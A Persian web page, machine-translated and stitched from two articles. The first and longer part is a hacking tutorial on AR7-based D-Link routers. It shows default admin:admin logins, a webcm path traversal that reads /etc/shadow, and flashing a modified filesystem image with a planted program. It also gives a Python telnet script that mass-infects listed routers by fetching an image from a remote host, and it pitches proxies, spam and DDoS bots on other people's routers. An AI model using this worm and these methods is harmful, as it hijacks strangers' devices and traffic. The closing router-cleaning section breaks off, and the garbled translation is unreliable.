چگونه بفهمیم روتر آلوده به ویروس است؟ چگونه روتر خود را برای آلودگی VPNFilter بررسی کنید

سلام خواننده من! در این مقاله در مورد روترهای فوق العاده ADSL صحبت خواهم کرد.
- قطعات آهنی ضروری در شبکه های خانگی و صنعتی. من در مورد سوال به شما می گویم
بهره برداری از این قطعات آهن برای اهداف سودمند برای ما - خیاطی به صورت وحشیانه
تروجان داخل روتر و به گونه ای که هیچکس متوجه نشود
مدیر هوشمند، بدون کاربر گوش بزرگ.

خواسته ها یا الزامات IQ

وقتی این مقاله را نوشتم، تصور کردم که خواندن آن کافی است
یک کاربر پیشرفته با GNU\Linux نصب شده که مهارت هایی نیز دارد
کار و برنامه نویسی در این سیستم عامل. با این حال، به نظر می رسد
امکان تکرار مراحل من در ویندوز (برای مثال با استفاده از Cygwin)، اما
شرح داده نخواهد شد. برای حداکثر لذت، شما نیز نیاز دارید
مهارت های آهن لحیم کاری (این اختیاری است).

و همه چیز شروع شد...

چیزی که من از آن دوری می کنم. بنابراین، همه چیز از این شروع شد که چگونه یک روز به همین سادگی
یک قطعه آهن، یا بهتر است بگوییم، خیانتکارانه اتصال به اینترنت را قطع کرد و نشد
می خواست آن را بازیابی کند در همان زمان، او دور بود، دسترسی فیزیکی
او آنجا نبود (اما من در مورد چیزی دروغ گفتم - من خیلی تنبل بودم که از روی مبل بلند شوم
روتر را مجددا راه اندازی کنید :))، رابط وب پاسخ نداد، اما من آن را به یاد آوردم
این چیز باید telnet یا ssh باشد. وارد بخش مدیریت شوید
من قبلا امتحان نکرده بودم و بدون ملاحظه رمز عبور را به خودم تغییر ندادم حساب(چگونه
بعداً معلوم شد، بیهوده، زیرا به طور پیش فرض "admin: admin" است). پس من
SSH را امتحان کرد و کار کرد!

$ ssh [ایمیل محافظت شده]
$Password:

مثل یک پیچ از آبی! Busybox! هرگز به اینکه تحت چه کسی است فکر نکردم
این روتر در کنترل است، معلوم است - GNU / Linux! ترسیدم
من تعجب می کنم که چگونه همه چیز اینجا کار می کند، و از نظر ذهنی به لطف تنبلی و شانس، من
شروع به تحقیق کرد

مجموعه اطلاعات

پس از کجا شروع کردم؟ البته از لیست دستورات موجود:

#جعبه مشغول
...
توابع تعریف شده فعلی:
[, خاکستر, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep، نام میزبان، شناسه، ifconfig، init، insmod، kill، ln، لاگین، ls، lsmod، mkdir،
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
همگام سازی، تار، تست، tftp، لمس، درست، tty، مقدار، wget، whoami، بله

این مجموعه کاملاً سالم است، برای تحقیق عادی و اجرای ایده ها کافی است.
بعد، علاقه به نسخه هسته ایجاد شد:

# cat /proc/version
نسخه لینوکس 2.4.17_mvl21-malta-mips_fp_le ( [ایمیل محافظت شده]) (gcc نسخه 2.95.3
20010315 (انتشار/MontaVista)) #1 پنجشنبه 28 دسامبر 05:45:00 CST 2006

برای مرجع: MontaVista توزیعی است که بر روی embedded متمرکز شده است
سیستم های. اکثریت قریب به اتفاق تولید کنندگان تجهیزات شبکه انفاق می کنند
اولویت برای این سیستم همچنین می توان آن را در دستگاه های دیگر، به عنوان مثال، در
کتاب های الکترونیکی یا تلفن های همراه.

# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
پردازنده
: 0
مدل cpu
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
دستورالعمل صبر کنید: خیر
تایمرهای میکروثانیه: بله
بردار وقفه اضافی: بله
نقطه نظارت سخت افزاری: بله
استثناهای VCED: در دسترس نیست
استثناهای VCEI: در دسترس نیست

AR7 یک تراشه دو هسته ای است که توسط Texas Instruments ساخته شده است. او
شامل یک روتر ADSL تمام عیار بر روی یک تراشه است که از استانداردهای ADSL1 پشتیبانی می کند.
ADSL2,ADSL2+. بر اساس عملکرد بالا پردازنده MIPS 4KEc RISC، با
فرکانس ساعت 175 یا 233 (بسته به تکنولوژی تولید: 18 میکرومتر
یا 13 میکرومتر). این تراشه شامل 2 رابط UART روی برد است که یکی از آنها (UART_A)
برای خروجی اطلاعات اشکال زدایی و همچنین یک رابط EJTAG که خدمت می کند استفاده می شود
برای اشکال زدایی (سیرم افزار) حافظه فلش. در مورد استفاده از این رابط ها خواهد بود
در زیر شرح داده شده است.

در نهایت به اطلاعات حافظه نگاه کردم:

# cat /proc/mounts
/dev/mtdblock/0 / squashfs ro 0 0
هیچ /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# cat /proc/mtd
dev: اندازه پاک کردن نام
mtd0:0034f000 00010000 "mtd0"
mtd1:00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

به طور طبیعی، آدرس های بلوک را فراموش نکنید:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000.0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

از موارد بالا، نتیجه این شد که حافظه فلش (/dev/mtdblock) دارای 5 بلوک است:

mtd0- تصویر سیستم فایل SquashFs. این یک فایل خاص است
سیستمی که فشرده و فقط خواندنی است. برای
فشرده سازی از الگوریتم gzip استفاده می کند، اما این مورد- LZMA (نسبت تراکم
در بالا). حجم این بلوک 4 مگابایت است.

mtd1– این بلوک حاوی هسته MontaVista است که توسط الگوریتم LZMA فشرده شده است
شرایط، اندازه بلوک 600 کیلوبایت.

mtd2– بوت لودر ADAM2، بوت هسته را انجام می دهد، همچنین دارد
سرویس سرور FTP برای بازیابی و فلش. بیشتر در مورد آن خواهد بود
در ادامه گفت. حجم بلوک 64 کیلوبایت است.

mtd3- به اشتراک گذاشته شده بین داده های پیکربندی و محیط
بلوک (متغیرهای محیطی) که در /proc/ticfg/env قابل مشاهده است.
داده های پیکربندی در /etc/config.xml هستند. یک واسطه بین پرونده
بلوک پیکربندی سیستم بسته است (مانند تمام cm_*هایی که کنترل، o
آنها بعدا) برنامه cm_logic. حجم این بلوک نیز 64 کیلوبایت است.

mtd4- این شامل امضای سیستم عامل، هسته و تصویر فایل است
سیستم های. این بلوک هنگام به روز رسانی سیستم عامل از طریق رابط وب استفاده می شود.
ابتدا در این بلوک ذخیره می شود، سپس چک جمع بررسی می شود
و اگر همگرا شود، به مکان جدیدش نوشته می شود.

رم (16 مگابایت در این مدل، اما ADAM2 در این مدل
فقط 14 مگابایت را می بیند، با یک به روز رسانی درمان می شود)، در پوشه /var نصب می شود، و
می توان با خیال راحت برای اهداف ما استفاده کرد:

# رایگان
کل بافرهای مشترک رایگان استفاده شده
مم: 14276 10452 3824 0

فراموش نکنیم که فهرستی از فرآیندها را مرور کنیم. از چیزهای جالبی که اینجا در کمین است
دیمون ها: thttpd - وب سرور. dproxy - کش کردن پرس و جوهای DNS سرور پروکسی. ddnsd
- دیمون DNS pppd... - دیمون واقعی که اتصال پروتکل را پیاده سازی می کند
PPP، و در پارامترها اطلاعات حساب را می بینیم. بنابراین، اگر روتر نیست
وانمود می کند که شلنگ است (بخوانید - نه در حالت پل)، سپس می توانید
آسان برای گرفتن یک حساب

برنامه های cm_* اختصاصی هستند و قبلاً در کدهای منبع گنجانده شده اند.
کامپایل شده (این برنامه ها نیز توسط Texas Instruments در D-Link توسعه داده شده اند
نیازی به سوگند خوردن برای عدم رعایت مجوزها نیست).

cm_logic- برنامه ای که منطق سیستم را از طریق آن کنترل می کند
پیکربندی را پاس می کند. /etc/config.xml را با آن همگام می کند
قسمت مربوطه از محتویات /dev/ticfg (اشاره به mtd3).

cm_cli- رابط خط فرمانبرای مدیریت و پیکربندی
سیستم های. برای مثال تنظیمات اتصال از طریق این رابط انجام می شود.

cm_pc- راه اندازی و نظارت بر فرآیندها، پیوند با قوانین
(به عنوان مثال، برنامه را به صورت دیمون اجرا کنید، قوانین همچنین شامل اطلاعاتی در مورد آن هستند
پورت برای باز کردن) همانطور که در /etc/progdefs.xml توضیح داده شده است. بلافاصله پس از بارگیری
هسته ها

webcm- رابط CGI پر از سوراخ است، به عنوان مثال به شما اجازه می دهد به /etc/shadow نگاه کنید،
به سادگی با دسترسی به URL.

http://192.168.1.1/../../../etc/shadow

چیزی متوجه نشدم، thttpd چندان ساده نیست، اما اگر چنین است:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

یک چیز دیگر. در صورت عدم دسترسی می توان از این برای جمع آوری اطلاعات استفاده کرد
ssh/telnet، اما دسترسی به رابط وب وجود دارد.

firmwarecfg- برای فلش زدن از طریق رابط وب استفاده می شود. در ورودی
از این برنامه، یک تصویر توسط یک درخواست POST از رابط وب منتقل می شود، و قبلاً نیز انجام شده است
پس از بررسی به حافظه فلش هدایت می شود چک جمعتصویر

این مجموعه اطلاعات اولیه را کامل می کند، وقت آن است که به سمت تصمیم گیری حرکت کنید
اقدامات.

نصب ابزارهای توسعه و کامپایل سیستم عامل

سیستم عامل روترهای D-Link(و همه افراد دیگر مبتنی بر گنو/لینوکس)
توزیع شده تحت مجوز GPL، می توانید آنها را در رسمی دریافت کنید
سرور FTP. در واقع، شما می توانید هر یک از لیست سیستم عامل های پیشنهادی را انتخاب کنید،
آنها یکسان هستند (در مورد سری T). در تحویل - کد منبع هسته، محیط،
ابزارها و زنجیره ابزار لازم برای توسعه/تدوین موجود
برنامه ها. باید به root باز شود و به متغیر محیطی اضافه شود
مسیر PATH به دایرکتوری bin toolchain:

$ tar xvf tools.tgz
$ صادرات PATH=$PATH:/opt/

اکنون برای کامپایل سیستم عامل خود، به دایرکتوری بروید
با کدهای منبع و اجرای همین make.

$ cd DSL/TYLinuxV3/src && make

سوالات زیادی در مورد فعال کردن پشتیبانی دستگاه پرسیده می شود (بهتر
به آنها پاسخ مثبت دهید). در پایان کامپایل در دایرکتوری TYLinuxV3/images
تصاویر سیستم عامل ایجاد خواهد شد. همچنین می توانید اسکریپتی را با همان نام خود اجرا کنید.
مدل از دایرکتوری /TYLinuxV3/src/scripts.

چند کلمه در مورد انتقال فایل بین روتر و کامپیوتر. اولین
روشی که من استفاده کردم توانایی انتقال فایل ها با استفاده از پروتکل SSH است.
برای این کار از برنامه scp استفاده کنید. اما کمی بعد متوجه شدم که mc (نیمه شب
Commander) همچنین قابلیت اتصال از طریق SSH (پنل -> اتصال شل) را دارد.
از طرف دیگر، می توانید یک سرور وب یا FTP در محل کار خود راه اندازی کنید. بعدا من
به وب سرور ترجیح داده شد، زیرا سریعتر کار می کند. من نصب کردم
thttpd، کوچک و سریع، درست مانند روتر. ما در خانه راه اندازی می کنیم و ادامه می دهیم
فایل روتر، پس از رفتن به پوشه /var (همانطور که گفته شد
قبلاً برای ضبط در دسترس بود).

$ thttpd -g -d ~/ForRouter -u user -p 8080
# سی دی /var
# wget http://192.168.1.2/file

برای دانلود یک فایل از روتر، می توانید وب سرور را نیز بالا ببرید:

# thttpd -g -d /var -u ریشه -p 8080

توجه کنید، اگر می خواهید یک فایل اجرایی از روتر دانلود کنید، باید
حذف حقوق راه اندازی هنگام دانلود تعداد زیادیفایل ها از روتر
بهتر است از mc استفاده کنید، لازم نیست ابتدا فایل ها را در /var کپی کنید و
حقوق را حذف کنید و سپس این فایل ها را حذف کنید تا فضا آزاد شود. به طور کلی، موضوع
سلیقه، هر گزینه ای که برای شما مناسب است را انتخاب کنید.

ایجاد برنامه خود

بیایید، البته، با کلاسیک برنامه نویسی - HelloWorld - شروع کنیم. برخی خاص
مقرراتی در کار نیست. متن برنامه به طرز دردناکی آشناست:

#عبارتند از
#عبارتند از

int main (void)
{
printf("Mate.Feed.Kill.Repeat.");
بازگشت 0;
}

ما کامپایل می کنیم (مسیر زنجیره ابزار "و باید در متغیر محیطی مشخص شود
مسیر):

$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell

# سی دی /var
# chmod + x hell
# ./جهنم

و... هیچ اتفاقی نمی افتد، یا اعلان مسیر می افتد پیدا نشد. چیست
یک کسب و کار؟ قبلاً در مورد cm_pc صحبت کردم - این برنامه برنامه های دیگر را راه اندازی می کند
طبق قوانین توضیح داده شده در /etc/progdefs.xml. در اینجا زمان می رسد
تصاویر سیستم فایل را اصلاح و فلش کنید.

اصلاح سیستم فایل

برای تغییر سیستم فایل، ابتدا باید
باز کردن بسته بندی همانطور که اشاره کردم، فایل سیستم در اینجا SquashFs با پچ LZMA است.
بسته توسعه سیستم عامل فقط شامل برنامه mksquashfs (برای ایجاد
تصویر)، unsquashfs (برای باز کردن بسته بندی) وجود ندارد. اما مهم نیست، همه چیز در دسترس است
در وب سایت سیستم فایل، به نسخه اول نیاز داریم. با اعمال پچ LZMA و
پس از جمع آوری وسایل برقی، آنها را در آن قرار دهید نقطه راحت. ابتدا بیایید یک تصویر بگیریم
سیستم فایل از روتر:

# cat /dev/mtdblock/0 > /var/fs.img

$ mkdir unpacked_fs
$unsquashfs fs.img unpacked_fs

اکنون می‌توانید هر طور که دوست دارید تغییر دهید، اما ما می‌خواهیم FuckTheWorld را وارد کنیم
دایرکتوری /bin و یک قانون برای اجرا در /etc/progdefs.xml اضافه کنید.

$ cp سلام unpacked_fs/bin
$ vim unpacked_fs/etc/progdefs.xml

و این را اضافه کنید (بین تگ ها ):

جهنم
/bin/hell

ذخیره و بسته بندی مجدد:

$ mksquashfs unpacked_fs my_fs.img -noappend

توجه داشته باشید که تصویر سیستم فایل نباید بیشتر شود
اندازه های مجاز اگر می خواهید چیزی را فوراً امتحان کنید، اما این کار را نمی کند
مناسب است، چیزی "غیر ضروری" مانند grep، whoami، یا را از تصویر حذف کنید
از بسته‌بندی اجرایی UPX استفاده کنید. اکنون در روتر آپلود کنید
تصویر و به بخش بعدی بروید.

گرفتن تصویر سیستم فایل

روش فلش کردن روتر بسیار ساده است و شامل دسترسی به دستگاه است
/dev/mtdblock/*. بنابراین، تصویر فایل را به هر روشی مناسب در روتر آپلود کنید.
سیستم و این عمل ساده را انجام دهید:

# cat my_fs.img > /dev/mtdblock/0 && راه اندازی مجدد

# cp my_fs.img /dev/mtdblock/0 && راه اندازی مجدد

پس از مدتی، هنگامی که فرآیند ضبط به پایان رسید، روتر راه اندازی مجدد می شود، و
تغییرات اعمال خواهد شد بیایید سعی کنیم مثال خود را اجرا کنیم:

#جهنم
Mate. Feed. Kill. Repeat.

راه های بازیابی در صورت شکست

قبل از فلش کردن روتر با "صنایع دستی" جدی تر، باید یاد بگیرید که چگونه
در موارد بحرانی که روتر امتناع می کند عمل کنید
بار. هیچ موقعیت ناامید کننده ای وجود ندارد. سرور ADAM2 FTP به کمک می آید. برای
ابتدا باید کلاینت FTP را روی آدرس IP ADAM2 اجرا کنید، که می توان آن را مشاهده کرد
در /proc/ticfg/env (پارامتر my_ipaddress).

ftp $ 192.168.1.199
220 ADAM2 سرور FTPآماده.
530 لطفا با USER و PASS وارد شوید.

برای وضوح، می توانید حالت اشکال زدایی و سپس همه را روشن کنید
اطلاعات و تمام پاسخ های FTP:

ورود / رمز عبور - adam2 / adam2. فرآیند فلش کردن بسیار ساده است. برای شروع
جلسه FTP را به حالت باینری تغییر دهید:

ftp> نقل قول MEDIA FLSH

حالا مثلا یک تصویر از فایل سیستم ارسال می کنیم و مکان را مشخص می کنیم
مقصد:

ftp> قرار دادن fs.img "fs.img mtd0"

ما منتظر پایان ضبط هستیم، روتر را راه اندازی مجدد کنید، از جلسه خارج شوید:

ftp> نقل قول راه اندازی مجدد
ftp> ترک

همه چيز! همانطور که می بینید، هیچ چیز سختی وجود ندارد، حالا اگر مشکلی پیش بیاید، شما
شما همیشه می توانید همه چیز را درست کنید

برای راحتی، باید یک آدرس IP معمولی را فعال کنید
دانلود خودکار (به طوری که با تنظیم مجدد رقص نکنید) و کمی زمان را افزایش دهید
قبل از بارگیری کرنل منتظر اتصال باشید. همه این تنظیمات در آن ذخیره می شود
متغیرهای محیطی است دستورات ویژه FTP ADAM2: GETENV و SETENV (برای
به ترتیب دریافت و تنظیم یک متغیر). در جلسه FTP موارد زیر را وارد کنید
دستورات:

ftp> بارگذاری خودکار SETENV، 1
ftp> SETENV autoload_timeout,8
ftp> SETENV my_ipaddress,192.168.1.1
ftp> نقل قول راه اندازی مجدد
ftp> ترک

روتر راه اندازی مجدد می شود و می توانید در 192.168.1.1:21 به ADAM2 بروید. اگر
تمایل به بازتاب مجدد تصویر هسته وجود خواهد داشت و هسته از بوت کردن، FTP خودداری می کند.
خود آغاز خواهد شد قبل از فلش زدن با تصاویر اصلاح شده، حتما
موارد فعلی را برای بازیابی ذخیره کنید. به طور کلی می توانید متغیرهای محیط را تغییر دهید
و از طریق /proc/ticfg/env، من فقط می خواستم در مورد کار با FTP بیشتر صحبت کنم.

# echo my_ipaddress 192.168.1.1 > proc/ticfg/env

و می توانید تغییرات را به صورت زیر بررسی کنید:

# cat /proc/ticfg/env | grep my_ipaddress

اگر می خواهید بوت لودر را فلش کنید چه باید کرد و چگونه
در صورت شکست اقدام کنیم؟ یا روتر به دلایلی شروع نمی شود و
به ADAM2 دسترسی ندارید؟ یک راه خروج وجود دارد - JTAG، یا بهتر است بگوییم، EJTAG در این تراشه وجود دارد
(نسخه توسعه یافته). این یک رابط برای اشکال زدایی / برنامه نویسی در مدار است.

برای اتصال به این رابط، به پورت LPT کامپیوتر نیاز داریم،
کانکتور و 4 مقاومت طرح ساده است.

من عجله می کنم که سیستم عامل از طریق JTAG یک تجارت سریع نیست، به اندازه کافی طول می کشد
زمان زیاد. بنابراین فقط باید برای بازیابی بوت لودر استفاده شود،
حتی اگر کار نکند برای برقراری ارتباط از طریق JTAG، باید از یک ویژه استفاده کنید
برنامه ای مانند UrJTAG. در زیر نمونه ای از نحوه عملکرد این رابط را مشاهده می کنید.
راه اندازی ارتباط:

jtag> کابل موازی 0x378 DLC5
jtag> شناسایی

تشخیص حافظه فلش:

jtag> detectflash 0x30000000 1

خواندن حافظه فلش:

jtag> readmem 0x30000000 0x400000 fullflash.img

نوشتن در حافظه (بوت لودر):

jtag> flashem 0x30000000 adam2.img

همچنین دانستن در مورد رابط UART مفید است (قولا قول داده بودم در مورد آن صحبت کنم). که در
UART_A گزارش می دهد، یعنی بوت لودر ثبت می شود (در مرحله اولیه بوت شدن از
می توانید با او صحبت کنید) و هسته اصلی. هنگام نوشتن کرنل های اصلاح شده، این
برای رفع اشکال ضروری است. UART - گیرنده/فرستنده ناهمزمان جهانی
(فرستنده ناهمزمان جهانی) تقریباً همیشه روشن است
میکروکنترلرها

مدار آداپتور بسیار ساده است. بر اساس تنها یک تراشه -
مبدل سطح TTL: MAX232 برای COM و FT232R برای USB. ریز مدارها
بسیار رایج هستند و هیچ مشکلی در خرید وجود نخواهد داشت.

مدار بر روی تخته نان (که می تواند با خیال راحت در یک کیس قرار گیرد) مونتاژ می شود
کانکتور پورت COM) در 20 دقیقه و مزایای زیادی را به همراه دارد. به عنوان مثال، هنگام اشکال زدایی
هسته ها یک راه حل کاملاً ضروری هستند. و اگر الکترونیک سفت باشد؟ خروج
کابل های USB برای گوشی های قدیمی هستند، آنها فقط یک مبدل دارند
UART - USB.

چند ایده توزیع

پروکسی/جوراب شما در روتر شخص دیگری عالی است. همانطور که در واقع هرزنامه است
روتر روی همه پروتکل ها این یک کامپیوتر ویندوزی برای شما نیست.
هر ماه دوباره چیدمان کنید :). روترها اغلب تغییر نمی کنند یا دوباره فلش می شوند. بله و
چه کسی، به جز ما، ایده آلوده کردن یک روتر را دارد؟

فراموش نکنید، ما تمام ترافیک کاربر/شبکه ​​را کنترل می کنیم. برای بیشتر
روترهای قدرتمند و در حال حاضر امکان آویز کردن ربات DDOS وجود دارد. مخفی کردن فایل/پنهان کردن فرآیند،
رهگیری نوشتن در بلوک های mtd، حذف پاک شدن برنامه ما - همه چیز
هر چه!

فرض کنید قصد دارید یک برنامه جدی برای روتر بنویسید.
اشکال زدایی بسیار خوب مهم است، احتمالاً مجبور خواهید شد این کار را بارها انجام دهید
بازنویسی/بازیابی تصاویر... این یک چشم انداز بسیار غم انگیز است. حتی دست ها
کمی پایین تر، اگر منبع بازنویسی حافظه فلش را نیز در نظر بگیریم
کوچک (جزئیات بیشتر در اسناد مربوط به تراشه حافظه)، و چشم انداز وجود دارد
ولش کن اما راهی برای خروج وجود دارد! Qemu می تواند AR7 را تقلید کند! می توانید تصور کنید چه چیزی
آیا فرصت ها و راحتی بی حد و حصر را فراهم می کند؟ حالا هیچ چیزی برای جلوگیری از ما وجود ندارد
چیزی فوق العاده جالب بنویس!

بنابراین. شما یک برنامه نوشتید، آن را در روتر خود یا 1-2 نفر دیگر بررسی کردید، اما
کل شبکه هنوز در پیش است، آلوده کردن دستی یک کار طاقت فرسا است، در روتر دهم که از قبل شروع کرده اید
لعنت بر همه دنیا و از ریسمان «گربه» و «متد» در چشمان شناور است. بیا بنویسیم
برنامه ای برای خودکارسازی این اقدامات روتین. من زبان پایتون را انتخاب کردم.

برنامه کاری این است:

  • جمع آوری لیستی از روترها، به عنوان مثال، با استفاده از nmap.
  • اسکریپت باید آدرس های IP را به ترتیب از لیست بگیرد، از طریق وارد کنید
    شبکه راه دور با ورود / رمز عبور استاندارد؛
  • سپس همان اقدامات: آپلود تصویر اصلاح شده،
    بازنویسی، راه اندازی مجدد

#!/usr/bin/env پایتون
#Encode=UTF-8

واردات telnetlib، زمان

SERVER="http://anyhost.com/fs.image"

برای adr در open("iplist.txt"):
telnet = telnetlib.Telnet(addr)
telnet.set_debuglevel(1)
telnet.read_until("login:")
time.sleep (5)
telnet.write ("admin\n")
telnet.read_until("رمز عبور:")
telnet.write ("admin\n")
telnet.read_until("#")
telnet.write("cd /var && wget" + SERVER)
telnet.read_until("#")
telnet.write ("cat fs.image > /dev/mtdblock/0")
telnet.read_until("#")
telnet.write ("راه اندازی مجدد")
telnet.close()

منطق فیلمنامه بسیار با ایده آل فاصله دارد، حالا دلیل آن را توضیح می دهم. برای
ابتدا باید نسخه سیستم عامل / هسته و مدل روتر را بررسی کنید، زیرا ممکن است وجود داشته باشد
تفاوت عمده در عملکرد علاوه بر این، به جای خالی های میان افزار، باید دانلود کنید
تصویر سیستم فایل از روتر، باز کردن بسته بندی، تغییر و ارسال
بازگشت. این امر باعث از بین رفتن مشکلات سازگاری با موارد مختلف می شود
مدل ها / نسخه های سیستم عامل، زیرا ثبات کار برای شما مهم ترین چیز است.
همچنین، یک ویروس می تواند عملکرد یک کرم را داشته باشد و اگر بخواهید، همیشه می توانید
یک اسکنر شبکه را به آن وصل کنید، نیروی brute force برای RDP و تراشه های مشابه.

روش توزیع عالی دیگری نیز وجود دارد. هیچ چیز شما را از نوشتن باز نمی دارد
برنامه ای برای ویندوز که همراه شما خواهد بود (یا دانلود کنید
سرور) تصویری از سیستم فایل و در صورت وجود روتر را با آن آلوده کنید.
این برنامه را به همه روش های "استاندارد" توزیع کنید: درایوهای قابل جابجایی،
اکسپلویت برای برنامه ها، آلوده شدن برنامه های دیگر... ترکیب این روش ها،
می تواند یک بیماری همه گیر بزرگ باشد. فقط این عکس را تصور کنید
دستگاه های مشابهدر همه جا توزیع شده است.

حفاظت از روتر

پس از کاوش در تمام این موارد، فکر کردم: چگونه می توانم از روتر محافظت کنم؟ و سپس، می بینید،
من خودم را می گیرم. اولین قدم این است که رمز عبور کاربر را به یک رمز عبور پیچیده تر تغییر دهید
طولانی (محدود - 8 کاراکتر)، تغییر بنرها و تبریک خدمات
(با یک ویرایشگر هگز، یا ترجیحاً برنامه ها را مجدداً کامپایل کنید) تا
nmap یا سایر اسکنرها نمی توانند نسخه های خدمات را تعیین کنند.

همچنین باید پورت هایی را که شیاطین روی آن آویزان هستند تغییر دهید. این کار از طریق انجام می شود
تغییرات در progdefs.xml. Telnet را بکش (آسانترین راه برای انتخاب رمز عبور برای آن، بله
و پروتکل ناامن است، چرا به آن نیاز داریم)، ​​فایروال را روشن کنید، اتصال را مجاز کنید
به خدمات فقط از آدرس IP یا MAC خود. همچنین از فایروال استفاده کنید
برای محافظت از یک شبکه یا یک کامپیوتر، بیهوده نیست که وجود دارد. تنظیم شایسته
قوانین همیشه به محافظت کمک می کند.

نتیجه

نه تنها روترهای D-Link و سایر دستگاه های مشابه روی بسیاری ساخته شده اند
چیپ AR7، لیست شامل Acorp، NetGear، Linksys، Actionec... زیباست.
این AR7 همراه با MontaVista محبوب است. نتیجه می شود که با استفاده از همان
toolchain، بدون هیچ مشکلی می توانید مراحل توضیح داده شده در مقاله را انجام دهید.

در مورد آن فکر کنید: علاوه بر اقدامات مضر، می توانید کاری مفید / خوشایند نیز برای خود انجام دهید.
و دیگران (من بحث نمی کنم، لذت هک را نمی توان جایگزین کرد، اما هنوز).
شما می توانید سیستم عامل خود را بسازید، به عنوان مثال، روترهای قدرتمندتری که قادر به انجام آن هستند
دانلود / توزیع تورنت ... همه مدل ها دارای رابط USB 1.1 هستند اما در جوان تر
مدل های آن لحیم کاری نشده است. یک ماژول USB و یک درایور سیستم فایل را به هسته اضافه کنید،
روتر را به حافظه فلش مجهز کنید - و در نتیجه، نوعی ذخیره سازی شبکه برای آن دریافت می کنید
پول کم. گزینه‌های زیادی وجود دارد، و ایده‌ها باید هزاران نفر مطرح شوند - نه
خود را محدود کنید، ایجاد کنید و خلق کنید!

در هنگام توزیع اینترنت از طریق Wi-Fi از طریق روتر، ممکن است مشکلات مختلفی ظاهر شود. به عنوان مثال، کاهش سرعت و پینگ بالا ممکن است به دلیل ویروس هایی که تجهیزات توزیع کننده را آلوده می کنند رخ دهد. بیایید نگاهی دقیق تر به نحوه تمیز کردن روتر بیندازیم.

علائم

تجهیزات می توانند با انواع ویروس های زیر آلوده شوند:

  • کاهش سرعت انتقال اطلاعات به عنوان مثال، یک ویروس قادر است تنظیمات را از بین ببرد سرعت کم، از دست دادن سیگنال و غیره؛
  • جایگزینی آدرس سایت این اتفاق می افتد: شخصی به یک منبع می رود و یک برنامه مخرب DNS را تغییر می دهد و کاربر با تبلیغات به سایتی هدایت می شود یا قابل مشاهده می شود. بلوک های تبلیغاتیارسال شده توسط صاحبان سایت این ویروس همچنین خطرناک است زیرا می تواند به منبعی که حاوی محتوای مخرب دیگری است هدایت شود.


در هر صورت، اگر روتر ناپایدار است، باید آن را از نظر ویروس بررسی کنید، که به راحتی قابل حذف است.

عفونت چگونه رخ می دهد؟

روتر اینترنت را بین تمام ابزارهای متصل به آن توزیع می کند. این بدان معنی است که همه دستگاه ها به صورت یکسان عمل می کنند شبکه محلی. ویروس از این استفاده می کند: از طریق یک وب سایت یا یک فایل دانلود شده وارد رایانه می شود، سپس از طریق شبکه وارد روتر می شود که در آن اقدامات مخرب انجام می دهد.

شدت وضعیت به نسخه برنامه ویروس بستگی دارد، به عنوان مثال، برخی از آفات مخفیانه رفتار می کنند و تنها زمانی که در روتر قرار می گیرند شروع به فعالیت فعال می کنند، در حالی که برخی دیگر، برعکس، می توانند در طول مسیر به سیستم عامل آسیب برسانند.

بررسی تجهیزات شبکه برای عفونت

قبل از تمیز کردن تجهیزات از ویروس ها، باید روتر را از نظر وجود آنها بررسی کنید. برای این کار باید کابل اینترنت را مستقیما به پورت کامپیوتر متصل کنید. سیم WLAN را از روتر بیرون بکشید و آن را به رایانه متصل کنید و سپس دستکاری های زیر را انجام دهید:

  • مرورگر خود را راه اندازی کنید و چندین سایت را باز کنید. اطمینان حاصل کنید که محتوای آنها صحیح است و هیچ جایگزینی برای سایت ها، واحدهای تبلیغاتی وجود ندارد. برای راستی آزمایی بهتر است منابعی را انتخاب کنید که حضور تبلیغات در آنها نباشد.
  • شروع به اسکن کامپیوتر خود با یک برنامه آنتی ویروس کنید. این برای تعیین مسیر عفونت - از رایانه یا از روتر - ضروری است. به خاطر داشته باشید که ممکن است چندین ویروس وجود داشته باشد و آنها می توانند هم در سیستم و هم در تجهیزات شبکه وجود داشته باشند.


حذف ویروس

ویدیویی در مورد آلوده کردن روتر به ویروس در اینجا تماشا کنید:

برای حذف بد افزار، باید تنظیمات را به حالت اولیه بازنشانی کنید. اگر برنامه ویروس قبلاً به سیستم عامل آسیب رسانده باشد، باید مجدداً نصب شود.

تنظیم مجدد پارامترها

برای تمیز کردن روتر، باید تنظیمات آن را بازنشانی کنید:

  • دکمه Reset را در پشت دستگاه پیدا کنید. او اغلب از بین جمعیت متمایز می شود. آن را نگه دارید و نگه دارید تا روتر تنظیم مجدد و راه اندازی مجدد شود. به یاد داشته باشید که هنگام راه اندازی مجدد، تمام تنظیمات از بین می رود و روتر باید دوباره پیکربندی شود.


  • برای پیکربندی روتر، باید آن را با استفاده از کابل به کامپیوتر متصل کنید، سپس مرورگر را راه اندازی کنید و آدرس 192.168.0.1 را تایپ کنید. ممکن است متفاوت باشد و در خود روتر یا در اسناد مربوط به آن، در دستورالعمل ها نشان داده شده است. هنگام ورود به تنظیمات، اغلب وارد ورود به سیستم مدیریت می شوند و رمز عبور همان 12345 است. اگر وارد نشدید، باید دستورالعمل های تجهیزات شبکه را بررسی کنید.


  • گزینه ها را پیدا کنید راه اندازی سریع. همه موارد قابل اجرا را انتخاب کنید. همچنین می توانید رمز عبور و نام شبکه را تغییر دهید. پس از تکمیل فرآیند پیکربندی، آنها را ذخیره کرده و روتر را مجددا راه اندازی کنید.


پس از انجام تمام مراحل توضیح داده شده، بررسی کنید که آیا توانسته اید از شر مشکل خلاص شوید. اگر نه، پس باید تجهیزات شبکه را فلش کنید.

چگونه فلاش را انجام دهیم؟

